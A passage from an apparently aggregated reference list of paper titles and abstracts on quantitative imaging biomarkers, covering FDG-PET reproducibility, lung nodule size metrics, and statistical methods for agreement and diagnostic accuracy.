6 and 6% +/- 5 by multiplying SUV-lean and Ki by plasma glucose concentration. ::: ::: ::: CONCLUSION ::: SUV-lean and graphical Ki can be measured reproducibly, supporting their use in quantitative FDG PET algorithms. --- paper_title: Reproducibility of Common Semi-quantitative Parameters for Evaluating Lung Cancer Glucose Metabolism with Positron Emission Tomography using 2-Deoxy-2-[18F]Fluoro-D-Glucose paper_content: Abstract Purpose: Positron emission tomography (PET) with 2-deoxy-2-[ 18 F]fluoro-D-glucose (FDG) has been used for various cancers, but reproducibility of common utilized semi-quantitative parameters, such as the maximal single pixel standardized uptake value (SUV) and effective glycolytic volume (EGV), remains unknown. Knowledge of precision is essential for applying these parameters to treatment monitoring. The purpose of this investigation was to assess the precision of PET results obtained by repeated examinations of patients with untreated lung cancer. Patients and Methods: Ten patients with lung cancer underwent two PET examinations within a week with no intervening treatment. The reproducibility of three parameters:((1) maximal SUV of 1 × 1 pixel anywhere in the tumor, calculated on the basis of predicted lean body mass [SULmax]; (2) highest average SUV at 4 × 4 pixels in the tumor adjusted by predicted lean body mass [SULmean]; and (3) EGV calculated by multiplying SUL by tumor volume), using PET images obtained at 50–60 min post-injection, were examined. Plasma glucose, insulin and free fatty acid levels were also monitored. Results: The SULmax, SULmean, and EGV were measured with a mean ± S.D. difference of 11.3% ± 8.0, 10.1% ± 8.2, and 10.1% ± 8.0%, respectively. By multiplying SUL by plasma glucose concentration, the mean differences were slightly reduced to 7.2% ± 5.8, 6.7% ± 6.2, and 9.5% ± 8.2, respectively. Conclusion: These data indicate that commonly used semi-quantitative indices of glucose metabolism on PET show high reproducibly. This supports their use in sequential quantitative analysis in PET, such as in treatment response monitoring. (Mol Imag Biol 2002;4:171–178) --- paper_title: Reproducibility of Semi-quantitative Parameters in FDG-PET Using Two Different PET Scanners: Influence of Attenuation Correction Method and Examination Interval paper_content: PURPOSE ::: The aim of this study is to evaluate the reproducibility of semi-quantitative parameters obtained from two 2-deoxy-2-[F-18]fluoro-D-glucose-positron emission tomography (FDG-PET) studies using two different PET scanners. ::: ::: ::: METHODS ::: Forty-five patients underwent FDG-PET examination with two different PET scanners on separate days. Two PET images with different attenuation correction method were generated in each patient, and three regions of interest (ROIs) were placed on the lung tumor and normal organs (mediastinum and liver) in each image. Mean and maximum standardized uptake values (SUVs), tumor-to-mediastinum and tumor-to-liver ratios (T/M and T/L), and the percentage difference in parameters between two PET images (% Diff.) were compared. ::: ::: ::: RESULTS ::: All measured values except maximum SUV in the liver and tumor-related parameters (SUV in lung tumor, T/M, T/L) showed no significant difference between two PET images. ::: ::: ::: CONCLUSION ::: The mean measured values showed high reproducibility and demonstrate that follow-up study or measurement of tumor response to anticancer drugs can be undertaken by FDG-PET examination without specifying the particular type of PET scanner. --- paper_title: Reproducibility of 18F-FDG and 3'-Deoxy-3'-18F-Fluorothymidine PET Tumor Volume Measurements paper_content: The objective of this study was to establish the repeatability and reproducibility limits of several volume-related PET image-derived indices—namely tumor volume (TV), mean standardized uptake value, total glycolytic volume (TGV), and total proliferative volume (TPV)—relative to those of maximum standardized uptake value (SUV max ), commonly used in clinical practice. Methods: Fixed and adaptive thresholding, fuzzy C-means, and fuzzy locally adaptive Bayesian methodology were considered for TV delineation. Double-baseline 18 F-FDG (17 lesions, 14 esophageal cancer patients) and 3'-deoxy-3'- 18 F-fluorothymidine ( 18 F-FLT) (12 lesions, 9 breast cancer patients) PET scans, acquired at a mean interval of 4 d and before any treatment, were used for reproducibility evaluation. The repeatability of each method was evaluated for the same datasets and compared with manual delineation. Results: A negligible variability of less than 5% was measured for all segmentation approaches in comparison to manual delineation (5%-35%). SUV max reproducibility levels were similar to others previously reported, with a mean percentage difference of 1.8% ± 16.7% and -0.9% ± 14.9% for the 18 F-FDG and 18 F-FLT lesions, respectively. The best TV, TGV, and TPV reproducibility limits ranged from -21% to 31 % and -30% to 37% for 18 -FDG and 18 F-FLT images, respectively, whereas the worst reproducibility limits ranged from -90% to 73% and -68% to 52%, respectively. Conclusion: The reproducibility of estimating TV, mean standardized uptake value, and derived TGV and TPV was found to vary among segmentation algorithms. Some differences between 18 F-FDG and 18 F-FLT scans were observed, mainly because of differences in overall image quality. The smaller reproducibility limits for volume-derived image indices were similar to those for SUV maX , suggesting that the use of appropriate delineation tools should allow the determination of tumor functional volumes in PET images in a repeatable and reproducible fashion. --- paper_title: Quantitative imaging for evaluation of response to cancer therapy. paper_content: Advances in molecular medicine offer the potential to move cancer therapy beyond traditional cytotoxic treatments to safer and more effective targeted therapies based on molecular characteristics of a patient's tumor. Within this context, the role of quantitative imaging as an in vivo biomarker has received considerable attention as a means to predict and measure the response to therapy. For example, the ability to predict the response to therapy quantitatively, early in the drug or radiation therapy regime, would facilitate adaptive therapy trial strategies, that is, that permit alternative treatment regimens in cases where initial therapy response was ineffective. Similarly, the ability to measure the response to therapy should provide a more robust means for both therapy dose management and correlation of imaging results with other laboratory biomarkers. The latter is required for clinical decision making in the clinical setting. The National Cancer Institute (NCI) in collaboration with the Food and Drug Administration (FDA) has therefore promoted a number of initiatives supporting the role of molecular imaging in drug trials. The major goal of these initiatives is the “qualification” of the proposed molecular imaging protocol(s) that can be incorporated into current or future drug trials submitted to the FDA. Clinical research strategies that will help achieve these goals are described in the published literature [1–5]. --- paper_title: Five-year lung cancer screening experience: CT appearance, growth rate, location, and histologic features of 61 lung cancers. paper_content: PURPOSE ::: To retrospectively evaluate the computed tomography (CT)-determined size, morphology, location, morphologic change, and growth rate of incidence and prevalence lung cancers detected in high-risk individuals who underwent annual chest CT screening for 5 years and to evaluate the histologic features and stages of these cancers. ::: ::: ::: MATERIALS AND METHODS ::: The study was institutional review board approved and HIPAA compliant. Informed consent was waived. CT scans of 61 cancers (24 in men, 37 in women; age range, 53-79 years; mean, 65 years) were retrospectively reviewed for cancer size, morphology, and location. Forty-eight cancers were assessed for morphologic change and volume doubling time (VDT), which was calculated by using a modified Schwartz equation. Histologic sections were retrospectively reviewed. ::: ::: ::: RESULTS ::: Mean tumor size was 16.4 mm (range, 5.5-52.5 mm). Most common CT morphologic features were as follows: for bronchioloalveolar carcinoma (BAC) (n = 9), ground-glass attenuation (n = 6, 67%) and smooth (n = 3, 33%), irregular (n = 3, 33%), or spiculated (n = 3, 33%) margin; for non-BAC adenocarcinomas (n = 25), semisolid (n = 11, 44%) or solid (n = 12, 48%) attenuation and irregular margin (n = 14, 56%); for squamous cell carcinoma (n = 14), solid attenuation (n = 12, 86%) and irregular margin (n = 10, 71%); for small cell or mixed small and large cell neuroendocrine carcinoma (n = 7), solid attenuation (n = 6, 86%) and irregular margin (n = 5, 71%); for non-small cell carcinoma not otherwise specified (n = 5), solid attenuation (n = 4, 80%) and irregular margin (n = 3, 60%); and for large cell carcinoma (n = 1), solid attenuation and spiculated shape (n = 1, 100%). Attenuation most often (in 12 of 21 cases) increased. Margins most often (in 16 of 20 cases) became more irregular or spiculated. Mean VDT was 518 days. Thirteen of 48 cancers had a VDT longer than 400 days; 11 of these 13 cancers were in women. ::: ::: ::: CONCLUSION ::: Overdiagnosis, especially in women, may be a substantial concern in lung cancer screening. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: Repeatability of 18F-FDG PET in a Multicenter Phase I Study of Patients with Advanced Gastrointestinal Malignancies paper_content: 18 F-FDG PET is often used to monitor tumor response in multicenter oncology clinical trials. This study assessed the repeatability of several semiquantitative standardized uptake values (mean SUV [SUV mean ], maximum SUV [SUV max ], peak SUV [SUV peak ], and the 3-dimensional isocontour at 70% of the maximum pixel value [SUV 70% ]) as measured by repeated baseline 18 F-FDG PET studies in a multicenter phase I oncology trial. Methods: Double-baseline 18 F-FDG PET studies were acquired for 62 sequentially enrolled patients. Tumor metabolic activity was assessed by SUV mean , SUV max , SUV peak , and SUV 70% . The effect on SUV repeatability of compliance with recommended image-acquisition guidelines and quality assurance (QA) standards was assessed. Summary statistics for absolute differences relative to the average of baseline values and repeatability analysis were performed for all patients and for a subgroup that passed QA, in both a multi- and a single-observer setting. Intrasubject precision of baseline measurements was assessed by repeatability coefficients, intrasubject coefficients of variation (CV), and confidence intervals on mean baseline differences for all SUV parameters. Results: The mean differences between the 2 SUV baseline measurements were small, varying from -2.1 % to 1.9%, and the 95% confidence intervals for these mean differences had a maximum half-width of about 5.6% across the SUV parameters assessed. For SUV max , the intrasubject CV varied from 10.7% to 12.8% for the QA multi-and single-observer datasets and was 16% for the full dataset. The 95% repeatability coefficients ranged from -28.4% to 39.6% for the QA datasets and up to -34.3% to 52.3% for the full dataset. Conclusion: Repeatability results of double-baseline 18 F-FDG PET scans were similar for all SUV parameters assessed, for both the full and the QA datasets, in both the multi- and the single-observer settings. Centralized quality assurance and analysis of data improved intrasubject CV from 15.9% to 10.7% for averaged SUV max . Thresholds for metabolic response in the multicenter multiobserver non-QA settings were -34% and 52% and in the range of -26% to 39% with centralized QA. These results support the use of 18 F-FDG PET for tumor assessment in multicenter oncology clinical trials. --- paper_title: The Lung Image Database Consortium (LIDC): A comparison of different size metrics for pulmonary nodule measurements paper_content: RATIONALE AND OBJECTIVES ::: The goal was to investigate the effects of choosing between different metrics in estimating the size of pulmonary nodules as a factor both of nodule characterization and of performance of computer aided detection systems, because the latter are always qualified with respect to a given size range of nodules. ::: ::: ::: MATERIALS AND METHODS ::: This study used 265 whole-lung CT scans documented by the Lung Image Database Consortium (LIDC) using their protocol for nodule evaluation. Each inspected lesion was reviewed independently by four experienced radiologists who provided boundary markings for nodules larger than 3 mm. Four size metrics, based on the boundary markings, were considered: a unidimensional and two bidimensional measures on a single image slice and a volumetric measurement based on all the image slices. The radiologist boundaries were processed and those with four markings were analyzed to characterize the interradiologist variation, while those with at least one marking were used to examine the difference between the metrics. ::: ::: ::: RESULTS ::: The processing of the annotations found 127 nodules marked by all of the four radiologists and an extended set of 518 nodules each having at least one observation with three-dimensional sizes ranging from 2.03 to 29.4 mm (average 7.05 mm, median 5.71 mm). A very high interobserver variation was observed for all these metrics: 95% of estimated standard deviations were in the following ranges for the three-dimensional, unidimensional, and two bidimensional size metrics, respectively (in mm): 0.49-1.25, 0.67-2.55, 0.78-2.11, and 0.96-2.69. Also, a very large difference among the metrics was observed: 0.95 probability-coverage region widths for the volume estimation conditional on unidimensional, and the two bidimensional size measurements of 10 mm were 7.32, 7.72, and 6.29 mm, respectively. ::: ::: ::: CONCLUSIONS ::: The selection of data subsets for performance evaluation is highly impacted by the size metric choice. The LIDC plans to include a single size measure for each nodule in its database. This metric is not intended as a gold standard for nodule size; rather, it is intended to facilitate the selection of unique repeatable size limited nodule subsets. --- paper_title: An Introduction to the Bootstrap paper_content: Introduction The Accuracy of a Sample Mean Random Samples and Probabilities The Empirical Distribution Function and the Plug-In Principle Standard Errors and Estimated Standard Errors The Bootstrap Estimate of Standard Error Bootstrap Standard Errors: Some Examples More Complicated Data Structures Regression Models Estimates of Bias The Jackknife Confidence Intervals Based on Bootstrap "Tables" Confidence Intervals Based on Bootstrap Percentiles Better Bootstrap Confidence Intervals Permutation Tests Hypothesis Testing with the Bootstrap Cross-Validation and Other Estimates of Prediction Error Adaptive Estimation and Calibration Assessing the Error in Bootstrap Estimates A Geometrical Representation for the Bootstrap and Jackknife An Overview of Nonparametric and Parametric Inference Further Topics in Bootstrap Confidence Intervals Efficient Bootstrap Computations Approximate Likelihoods Bootstrap Bioequivalence Discussion and Further Topics Appendix: Software for Bootstrap Computations References --- paper_title: A comparison of the Two One-Sided Tests Procedure and the Power Approach for assessing the equivalence of average bioavailability paper_content: The statistical test of hypothesis of no difference between the average bioavailabilities of two drug formulations, usually supplemented by an assessment of what the power of the statistical test would have been if the true averages had been inequivalent, continues to be used in the statistical analysis of bioavailability/bioequivalence studies. In the present article, this Power Approach (which in practice usually consists of testing the hypothesis of no difference at level 0.05 and requiring an estimated power of 0.80) is compared to another statistical approach, the Two One-Sided Tests Procedure, which leads to the same conclusion as the approach proposed by Westlake based on the usual (shortest) 1-2 alpha confidence interval for the true average difference. It is found that for the specific choice of alpha = 0.05 as the nominal level of the one-sided tests, the two one-sided tests procedure has uniformly superior properties to the power approach in most cases. The only cases where the power approach has superior properties when the true averages are equivalent correspond to cases where the chance of concluding equivalence with the power approach when the true averages are not equivalent exceeds 0.05. With appropriate choice of the nominal level of significance of the one-sided tests, the two one-sided tests procedure always has uniformly superior properties to the power approach. The two one-sided tests procedure is compared to the procedure proposed by Hauck and Anderson. --- paper_title: Testing Statistical Hypotheses of Equivalence paper_content: Introduction. Methods for One-Sided Equivalence Problems. General Approaches to the Construction of Tests for Equivalence in the Strict Sense. Equivalence Tests for Selected One-Parameter Problems. Equivalence Tests for Designs with Paired Observation. Equivalence Tests for Two Unrelated Samples. Multi-sample Tests for Equivalence. Tests for Establishing Goodness of Fit. The Assessment of Bio-Equivalence. Appendix. References. Index --- paper_title: Comparison of thallium-201 SPECT and planar imaging methods for quantification of experimental myocardial infarct size paper_content: Abstract To compare single photon emission computed tomography (SPECT) and planar thallium-201 (TI-201) myocardial perfusion imaging methods for quantification of left ventricular infarct size, 12 dogs with 6 to 8 hours of closed-chest coronary occlusion and 5 normal dogs were studied. After intravenous administration of TI-201, SPECT and three-view planar images were obtained. After the animals were put to death, hearts were sliced and stained with triphenyltetrazolium chloride (TTC) for planimetric determination of left ventricular infarct size. Infarct size on each SPECT slice and planar image was defined as the percentage of circumferential count profiles falling below the limits derived from normal dogs. Infarct size as a percentage of left ventricular mass was determined from SPECT and planar images before and after correcting for differences in myocardial slice mass from apex to base. The correlation coefficients, the concordance correlation coefficients (reflecting closeness to the line of identity), and the mean absolute deviations of the four methods versus TTC staining were 0.83, 0.77, and 5.1% (SPECT, no correction); 0.85, 0.84, and 3.7% (SPECT with correction); 0.81, 0.42, and 12.9% (planar, no correction); and 0.75, 0.49, and 10.4% (planar with correction). The regression lines did not differ from the line of identity for SPECT, whereas they differed significantly for planar imaging. Thus both SPECT and planar imaging are well suited for quantification of left ventricular infarct size. SPECT, however, appears to be superior to planar imaging, since its regression line more closely approximates the line of identity. --- paper_title: A quantitative comparison of motion detection algorithms in fMRI paper_content: An important step in the analysis of fMRI time-series data is to detect, and as much as possible, correct for subject motion during the course of the scanning session. Several public domain algorithms are currently available for motion detection in fMRI. This paper compares the performance of four commonly used programs: AIR 3.08, SPM99, AFNI98, and the pyramid method of Thevenaz, Ruttimann, and Unser (TRU). The comparison is based on the performance of the algorithms in correcting a range of simulated known motions in the presence of various degrees of noise. SPM99 provided the most accurate motion detection amongst the algorithms studied. AFNI98 provided only slightly less accurate results than SPM99, however, it was several times faster than the other programs. This algorithm represents a good compromise between speed and accuracy. AFNI98 was also the most robust program in presence of noise. It yielded reasonable results for very low signal to noise levels. For small initial misalignments, TRU's performance was similar to SPM99 and AFNI98. However, its accuracy diminished rapidly for larger misalignments. AIR was found to be the least accurate program studied. © 2001 Elsevier Science Inc. All rights reserved. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: The FDA Critical Path Initiative and Its Influence on New Drug Development paper_content: Societal expectations about drug safety and efficacy are rising while productivity in the pharmaceutical industry is falling. In 2004, the US Food and Drug Administration introduced the Critical Path Initiative with the intent of modernizing drug development by incorporating recent scientific advances, such as genomics and advanced imaging technologies, into the process. An important part of the initiative is the use of public-private partnerships and consortia to accomplish the needed research. This article explicates the reasoning behind the Critical Path Initiative and discusses examples of successful consortia. --- paper_title: Statistical issues in the comparison of quantitative imaging biomarker algorithms using pulmonary nodule volume as an example paper_content: Quantitative imaging biomarkers are being used increasingly in medicine to diagnose and monitor patients’ disease. The computer algorithms that measure quantitative imaging biomarkers have different technical performance characteristics. In this paper we illustrate the appropriate statistical methods for assessing and comparing the bias, precision, and agreement of computer algorithms. We use data from three studies of pulmonary nodules. The first study is a small phantom study used to illustrate metrics for assessing repeatability. The second study is a large phantom study allowing assessment of four algorithms’ bias and reproducibility for measuring tumor volume and the change in tumor volume. The third study is a small clinical study of patients whose tumors were measured on two occasions. This study allows a direct assessment of six algorithms’ performance for measuring tumor change. With these three examples we compare and contrast study designs and performance metrics, and we illustrate the advantag... --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Properties of Sufficiency and Statistical Tests paper_content: 1—In a previous paper*, dealing with the importance of properties of sufficiency in the statistical theory of small samples, attention was mainly confined to the theory of estimation. In the present paper the structure of small sample tests, whether these are related to problems of estimation and fiducial distributions, or are of the nature of tests of goodness of fit, is considered further. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: Statistical methods in assessing agreement: Models, issues, and tools paper_content: Measurements of agreement are needed to assess the acceptability of a new or generic process, methodology, and formulation in areas of laboratory performance, instrument or assay validation, method comparisons, statistical process control, goodness of fit, and individual bioequivalence. In all of these areas, one needs measurements that capture a large proportion of data that are within a meaningful boundary from target values. Target values can be considered random (measured with error) or fixed (known), depending on the situation. Various meaningful measures to cope with such diverse and complex situations have become available only in the last decade. These measures often assume that the target values are random. This article reviews the literature and presents methodologies in terms of “coverage probability.” In addition, analytical expressions are introduced for all of the aforementioned measurements when the target values are fixed and when the error structure is homogenous or heterogeneous (proport... --- paper_title: Statistical methods in diagnostic medicine paper_content: Preface. Acknowledgments. 1. Introduction. 1.1 Why This Book? 1.2 What Is Diagnostic Accuracy? 1.3 Landmarks in Statistical Methods for Diagnostic Medicine. 1.4 Software. 1.5 Topics not Covered in This Book. 1.6 Summary. I BASIC CONCEPTS AND METHODS. 2. Measures of Diagnostic Accuracy. 2.1 Sensitivity and Specificity. 2.2 The Combined Measures of Sensitivity and Specificity. 2.3 The ROC Curve. 2.4 The Area Under the ROC Curve. 2.5 The Sensitivity at a Fixed FPR. 2.6 The Partial Area Under the ROC Curve. 2.7 Likelihood Ratios. 2.8 Other ROC Curve Indices. 2.9 The Localization and Detection of Multiple Abnormalities. 2.10 Interpretation of Diagnostic Tests. 2.11 Optimal Decision Threshold on the ROC Curve. 2.12 Multiple Tests. 3. The Design of Diagnostic Accuracy Studies. 3.1 Determining the Objective of the Study. 3.2 Identifying the Target Patient Population. 3.3 Selecting a Sampling Plan for Patients. 3.3.1 Phase I: Exploratory Studies. 3.3.2 Phase II: Challenge Studies. 3.3.3 Phase III: Clinical Studies. 3.4 Selecting the Gold Standard. 3.5 Choosing a Measure of Accuracy. 3.6 Identifying the Target Reader Population. 3.7 Selecting a Sampling Plan for Readers. 3.8 Planning the Data Collection. 3.8.1 Format for the Test Results. 3.8.2 Data Collection for the Reader Studies. 3.8.3 Reader Training. 3.9 Planning the Data Analyses. 3.9.1 Statistical Hypotheses. 3.9.2 Reporting the Test Results. 3.10 Determining the Sample Size. 4. Estimation and Hypothesis Testing in a Single Sample. 4.1 Binary Scale Data. 4.1.1 Sensitivity and Specificity. 4.1.2 The Sensitivity and Specificity of Clustered Binary Data. 4.1.3 The Likelihood Ratio (LR). 4.1.4 The Odds Ratio. 4.2 Ordinal Scale Data. 4.2.1 The Empirical ROC Curve. 4.2.2 Fitting a Smooth Curve (Parametric Model). 4.2.3 Estimation of Sensitivity at a Particular FPR. 4.2.4 The Area and Partial Area Under the ROC Curve (Parametric Model). 4.2.5 The Area Under the Curve (Nonparametric Method). 4.2.6 Nonparametric Analysis of Clustered Data. 4.2.7 The Degenerate Data. 4.2.8 Choosing Between Parametric and Nonparametric Methods. 4.3 Continuous Scale Data. 4.3.1 The Empirical ROC Curve. 4.3.2 Fitting a Smooth ROC Curve (Parametric and Nonparametric Methods). 4.3.3 Area Under the ROC Curve (Parametric and Nonparametric). 4.3.4 Fixed FPR The Sensitivity and Decision Threshold. 4.3.5 Choosing the Optimal Operating Point. 4.3.6 Choosing Between Parametric and Nonparametric Techniques. 4.4 Hypothesis Testing About the ROC Area. 5. Comparing the Accuracy of Two Diagnostic Tests. 5.1 Binary Scale Data. 5.1.1 Sensitivity and Specificity. 5.1.2 Sensitivity and Specificity of Clustered Binary Data. 5.2 Ordinal and Continuous Scale Data. 5.2.1 Determining the Equality of Two ROC Curves. 5.2.2 Comparing ROC Curves at a Particular Point. 5.2.3 Determining the Range of FPR for Which TPR Differ. 5.2.4 A Comparison of the Area or Partial Area. 5.3 Tests of Equivalence. 6. Sample Size Calculation. 6.1 The Sample Size for Accuracy Studies of a Single Test. 6.1.1 Sensitivity and Specificity. 6.1.2 The Area Under the ROC Curve. 6.1.3 The Sensitivity at a Fixed FPR. 6.1.4 The Partial Area Under the ROC Curve. 6.2 The Sample Size for the Accuracy of Two Tests. 6.2.1 Sensitivity and Specificity. 6.2.2 The Area Under the ROC Curve. 6.2.3 The Sensitivity at a Fixed FPR. 6.2.4 The Partial Area Under the ROC Curve. 6.3 The Sample Size for Equivalent Studies of Two Tests. 6.4 The Sample Size for Determining a Suitable Cutoff Value. 7. Issues in Meta Analysis for Diagnostic Tests. 7.1 Objectives. 7.2 Retrieval of the Literature. 7.3 Inclusion Exclusion Criteria. 7.4 Extracting Information From the Literature. 7.5 Statistical Analysis. 7.6 Public Presentation. II ADVANCED METHODS. 8. Regression Analysis for Independent ROC Data. 8.1 Four Clinical Studies. 8.1.1 Surgical Lesion in a Carotid Vessel Example. 8.1.2 Pancreatic Cancer Exampl. 8.1.3 Adult Obesity Example. 8.1.4 Staging of Prostate Cancer Example. 8.2 Regression Models for Continuous Scale Tests. 8.2.1 Indirect Regression Models for Smooth ROC Curves. 8.2.2 Direct Regression Models for Smooth ROC Curves. 8.2.3 MRA Use for Surgical Lesion Detection in the Carotid Vessel. 8.2.4 Biomarkers for the Detection of Pancreatic Cancer. 8.2.5 Prediction of Adult Obesity by Using Childhood BMI Measurements. 8.3 Regression Models for Ordinal Scale Tests. 8.3.1 Indirect Regression Models for Latent Smooth ROC Curves. 8.3.2 Direct Regression Model for Latent Smooth ROC Curves. 8.3.3 Detection of Periprostatic Invasion With US. 9. Analysis of Correlated ROC Data. 9.1 Studies With Multiple Test Measurements of the Same Patient. 9.1.1 Indirect Regression Models for Ordinal Scale Tests. 9.1.2 Neonatal Examination Example. 9.1.3 Direct Regression Models for Continuous Scale Tests. 9.2 Studies With Multiple Readers and Tests. 9.2.1 A Mixed Effects ANOVA Model for Summary Measures of Diagnostic Accuracy. 9.2.2 Detection of TAD Example. 9.2.3 The Mixed Effects ANOVA Model for Jackknife Pseudovalues. 9.2.4 Neonatal Examination Example. 9.2.5 A Bootstrap Method. 9.3 Sample Size Calculation for Multireader Studies. 10. Methods for Correcting Verification Bias. 10.1 A Single Binary Scale Test. 10.1.1 Correction Methods With the MAR Assumption. 10.1.2 Correction Methods Without the MAR Assumption. 10.1.3 Hepatic Scintigraph Example. 10.2 Correlated Binary Scale Tests. 10.2.1 An ML Approach Without Covariates. 10.2.2 An ML Approach With Covariates. 10.2.3 Screening Tests for Dementia Disorder Example. 10.3 A Single Ordinal Scale Test. 10.3.1 An ML Approach Without Covariates. 10.3.2 Fever of Uncertain Origin Example. 10.3.3 An ML Approach With Covariates. 10.3.4 Screening Test for Dementia Disorder Example. 10.4 Correlated Ordinal Scale Tests. 10.4.1 The Weighted GEE Approach for Latent Smooth ROC Curves. 10.4.2 A Likelihood Based Approach for ROC Areas. 10.4.3 Use of CT and MRI for Staging Pancreatic Cancer Example. 11. Methods for Correcting Imperfect Standard Bias. 11.1 One Single Test in a Single Population. 11.1.1 Hypothetical and Strongyloides Infection Examples. 11.2 One Single Test in G Populations. 11.2.1 Tuberculosis Example. 11.3 Multiple Tests in One Single Population. 11.3.1 MLEs Under the CIA. 11.3.2 Assessment of Pleural Thickening Example. 11.3.3 ML Approaches Without the CIA. 11.3.4 Bioassays for HIV Example. 11.4 Multiple Binary Tests in G Populations. 11.4.1 ML Approaches Under the CIA. 11.4.2 ML Approaches Without the CIA. 12. Statistical Methods for Meta Analysis. 12.1 Sensitivity and Specificity Pairs. 12.1.1 One Common SROC Curve. 12.1.2 Study Specific SROC Curve. 12.1.3 Evaluation of Duplex Ultrasonography, With and Without Color Guidance. 12.2 ROC Curve Areas. 12.2.1 Fixed Effects Models. 12.2.2 Random Effects Models. 12.2.3 Evaluation of the Dexamethasone Suppression.Test. Index. --- paper_title: Total deviation index for measuring individual agreement with applications in laboratory performance and bioequivalence. paper_content: In areas of inter-laboratory quality control, method comparisons, assay validation and individual bioequivalence, etc., the agreement between observations and target (reference) values is of interest. The mean of the squared difference between observations and target values (MSD) is a good measure of the total deviation. A new user-friendly statistic, the total deviation index (TDI(1-p)), is introduced that translates the MSD into an index that can be directly compared to a predetermined criterion. The TDI(1-p) describes a boundary such that a majority, 100(1-p) per cent, of the observations are within the boundary (measurement unit and/or per cent) from their target values. Statistical inference using the sample counter part (estimate) is presented. A Monte Carlo experiment with 5000 runs was performed to confirm the estimate's validity. Applications in laboratory performance and validation, as well as individual bioequivalence, are presented. --- paper_title: A Collaborative Enterprise for Multi-Stakeholder Participation in the Advancement of Quantitative Imaging paper_content: We have formed the Quantitative Imaging Biomarker Alliance to enable cooperation and address issues in quantitative medical imaging by adapting the successful Integrating the Healthcare Enterprise precedent to the needs of imaging science. --- paper_title: Statistical issues in the comparison of quantitative imaging biomarker algorithms using pulmonary nodule volume as an example paper_content: Quantitative imaging biomarkers are being used increasingly in medicine to diagnose and monitor patients’ disease. The computer algorithms that measure quantitative imaging biomarkers have different technical performance characteristics. In this paper we illustrate the appropriate statistical methods for assessing and comparing the bias, precision, and agreement of computer algorithms. We use data from three studies of pulmonary nodules. The first study is a small phantom study used to illustrate metrics for assessing repeatability. The second study is a large phantom study allowing assessment of four algorithms’ bias and reproducibility for measuring tumor volume and the change in tumor volume. The third study is a small clinical study of patients whose tumors were measured on two occasions. This study allows a direct assessment of six algorithms’ performance for measuring tumor change. With these three examples we compare and contrast study designs and performance metrics, and we illustrate the advantag... --- paper_title: Statistical Tools for Measuring Agreement paper_content: Introduction. - Basic approach for paired continuous data when target values are random or fixed. - Sample size and power. - Unified approach for continuous and categorical data. --- paper_title: An ROC-type measure of diagnostic accuracy when the gold standard is continuous-scale. paper_content: ROC curves and summary measures of accuracy derived from them, such as the area under the ROC curve, have become the standard for describing and comparing the accuracy of diagnostic tests. Methods for estimating ROC curves rely on the existence of a gold standard which dichotomizes patients into disease present or absent. There are, however, many examples of diagnostic tests whose gold standards are not binary-scale, but rather continuous-scale. Unnatural dichotomization of these gold standards leads to bias and inconsistency in estimates of diagnostic accuracy. In this paper, we propose a non-parametric estimator of diagnostic test accuracy which does not require dichotomization of the gold standard. This estimator has an interpretation analogous to the area under the ROC curve. We propose a confidence interval for test accuracy and a statistical test for comparing accuracies of tests from paired designs. We compare the performance (i.e. CI coverage, type I error rate, power) of the proposed methods with several alternatives. An example is presented where the accuracies of two 